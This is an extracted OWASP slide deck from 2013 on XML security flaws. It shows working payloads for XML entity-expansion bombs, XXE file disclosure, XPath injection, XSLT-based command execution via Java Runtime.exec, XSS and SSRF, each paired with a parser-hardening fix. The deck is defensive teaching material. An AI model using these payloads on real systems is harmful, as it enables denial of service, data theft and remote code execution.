View
2.451
Download
1
Category
Tags:
Preview:
DESCRIPTION
XML processing security vulnerabilities and how to avoid them.
Citation preview
OWASP
Pierre Ernst, 2013
XML Attack Surface
Business Analytics Security Competency Group
Pierre Ernst, 2013 322/
OWASP
XML is Pervasive
Pierre Ernst, 2013 323/
OWASP
XML intro■Born in 1998 (see initial specifications)■Data interchange format
– International languages support– Text based – Human readable
■Parsers– DOM– SAX, rooted in Ottawa (see bio)– StAX
■Complementary technologies and standards– XML Validation (DTD, XSD, ...)– XML Transformation (XSLT)– XML Query (XQuery, XPath)
Pierre Ernst, 2013 324/
OWASP
Is XML Secure?
■Nothing wrong with the standard itself■Most vulnerabilities due to
– Libraries/Tools misconfiguration– Insufficient validation of untrusted input
known, reported security vulnerabilities (see CVE search)
Pierre Ernst, 2013 325/
OWASP
XML Bomb
■CWE-776: Denial of service (memory exhaustion)■Amit Klein, 2002 (see BugTraq)■XML entity expansion
<!DOCTYPE ibm [ <!ENTITY ernst128 "pierre"> <!ENTITY ernst127 "&ernst128;&ernst128;"> ... <!ENTITY ernst002 "&ernst003;&ernst003;"> <!ENTITY ernst001 "&ernst002;&ernst002;"> <!ENTITY ernst000 "&ernst001;&ernst001;">]><ibm>&ernst000;</ibm>
Pierre Ernst, 2013 326/
OWASP
Modus Operandi
POST /request HTTP/1.1
1
2
<ibm>&ernst000;</ibm><ibm>&ernst001;&ernst001;</ibm><ibm>&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;</ibm>
<ibm>&ernst002;&ernst002;&ernst002;&ernst002;</ibm>
Attacker Vulnerable Server
Pierre Ernst, 2013 327/
OWASP
Demo #1: Server Crash with XML Bomb
(Source code available on demand)
Pierre Ernst, 2013 328/
OWASP
Variation: “Quadratic Blowup Attack”
■Amit Klein (see MSDN article)■Uses one single entity of size 50KB■Reference the entity 50,000 times■Useful to bypass
FEATURE_SECURE_PROCESSING protection– Limits entity expansions to
• 100,000 (IBM)• 64,000 (Oracle)
<!DOCTYPE pierre [ <!ENTITY e "eeeeeeeeeeee...eeeeeeeee">]><pierre>&e;&e;&e;...&e;&e;&e;</pierre>
Pierre Ernst, 2013 329/
OWASP
Protection
DOM SAX StAXfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
Pierre Ernst, 2013 3210/
OWASP
External Entity Reference (XXE)
■CWE-611: Information Disclosure■Gregory Steuck, 2002 (see BugTraq)■Requires the server to include user-supplied data in
the response
<!DOCTYPE pierre [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">]><pierre>&ernst;</pierre>
Pierre Ernst, 2013 3211/
OWASP
Modus Operandi
POST /request HTTP/1.1
1
2<pierre>[... content of the file on the server...]</pierre>
<pierre> &ernst;</pierre>
3
HTTP/1.1 200 OKContent-Type: text/xml
<response> Unknown service [... content of the file on the server...]</response>
Attacker Vulnerable Server
Pierre Ernst, 2013 3212/
OWASP
Demo #2: File Content Disclosure with XXE
(Source code available on demand)
Pierre Ernst, 2013 3213/
OWASP
Protection
DOM SAX StAXfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
Pierre Ernst, 2013 3214/
OWASP
//users/user[name/text()= and password/text()= ]/name/text() //users/user[name/text()= and password/text()= ]/name/text()
'' or ''=''
'i8simon'
'pierre'
Blind Xpath Injection (“XML Injection”)
■CWE-643: Abuse of Functionality■Amit Klein, 2004 (see white-paper)■User input is embedded as-is in Xpath statement<users> <user> <name>pierre</name> <password>i8simon</password> </user> <user> <name>trevor</name> <password>mee2</password> </user> </users>
pierre
***********'' or ''=''
' or ''='
***********
Pierre Ernst, 2013 3215/
OWASP
Modus Operandi
POST /login HTTP/1.1
1
Attacker Vulnerable Server
//users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()
2
pierretrevor 3
HTTP/1.1 200 OKContent-Type: text/html
Pierre Ernst, 2013 3216/
OWASP
Demo #3: Blind Xpath Injection
(Source code available on demand)
Pierre Ernst, 2013 3217/
OWASP
Variation: Read System Properties
■ JAXP implementation:–IBM–Oracle
■ Interesting properties:–os.version–user.name–java.class.path–sun.java.command
system-property('sun.java.command')
Pierre Ernst, 2013 3218/
OWASP
Protection
■ Input Validation.■ “[A-Za-z0-9_\-]+” in our example.
Pierre Ernst, 2013 3219/
OWASP
Code Injection during XSLT
■CWE-94: Improper Control of Generation of Code■When the attacker can control the XML style sheet
applied to an XML document.■Uses transformer engine extension capabilities
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="xalan://java.lang.Runtime" exclude-result-prefixes="rt"> <xsl:template match="/"> <xsl:variable name="obj" select="rt:getRuntime()"/>
<xsl:value-of select="rt:exec($obj,'calc.exe')"/> </xsl:template></xsl:stylesheet>
Pierre Ernst, 2013 3220/
OWASP
Modus Operandi
GET /request?doc=...&stylesheet=... HTTP/1.1
1
<doc>whatever</doc>
<stylesheet>malicious</stylesheet>
2
Attacker Vulnerable Server
Load class java.lang.Runtime
Call exec() method
3
Pierre Ernst, 2013 3221/
OWASP
Demo #4: Remote OS Command Injection
(Source code available on demand)
Pierre Ernst, 2013 3222/
OWASP
Variation #1: Universal XXE
<!DOCTYPE xsl:stylesheet [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">]><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"> &ernst; </xsl:template>
</xsl:stylesheet>
●“Universal”: you always see the entity in the response
Pierre Ernst, 2013 3223/
OWASP
Variation #2: Infinite Loop
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template name="loop"> <xsl:call-template name="loop"/> </xsl:template>
<xsl:template match="/"> <xsl:call-template name="loop"/> </xsl:template></xsl:stylesheet>
1
2
Pierre Ernst, 2013 3224/
OWASP
Variation #3: Cross-Site Scripting (XSS)
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<xsl:output method="html"/> <xsl:template match="/"> <xhtml:script>alert('XSS');</xhtml:script> </xsl:template>
</xsl:stylesheet>
Pierre Ernst, 2013 3225/
OWASP
Protection
■Several ways to abuse XML Stylesheet Transforms.■Users should never been able to use custom XML
stylesheets.
Pierre Ernst, 2013 3226/
OWASP
Server Side Request Forgery (SSRF)
■CWE-601: Open Redirect, but server-to-server■ {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon)■XML vectors:
– Xml eXternal Entities (XXE)– Xinclude– External Doctype inclusion:
<!DOCTYPE PIERRE PUBLIC "ernst" "http://intranet:666/start-armageddon">
<pierre/>
Pierre Ernst, 2013 3227/
OWASP
POST /request HTTP/1.1Content-Type: application/xmlContent-Lenght: 666
<?xml version=”1.0”?>...
1
Attacker Vulnerable Server
Modus Operandi
Internal Service
2whatever
Pierre Ernst, 2013 3228/
OWASP
Protection
DOM SAX StAXfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
Pierre Ernst, 2013 3229/
OWASP
Variation: Exotic Java URL Handlers
■ {Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin}, 2012 (CVE-2012-5085)
Pierre Ernst, 2013 3230/
OWASP
Conclusions
■Always configure your XML parsers to disallow Doctype.
–From a server's perspective, clients should not be able to define the grammar of the request anyway
–Secure Processing Flag is not enough–Preventing external entity expansion is not
enough
■XPath: validate user's input■XSLT: avoid at any cost■Always apply Java patches from vendors
Pierre Ernst, 2013 3231/
OWASP
■10 years as Software Developer
■5 years as Penetration Tester– 750+ vulns– Manual Code Review– Manual Black Box Testing– Java, XML, Open Source, …
https://twitter.com/e_rnst
http://ca.linkedin.com/in/pernst
Pierre Ernst
pierre.ernst@gmail.com
Pierre Ernst, 2013 3232/
OWASP
Questions & Answers
Recommended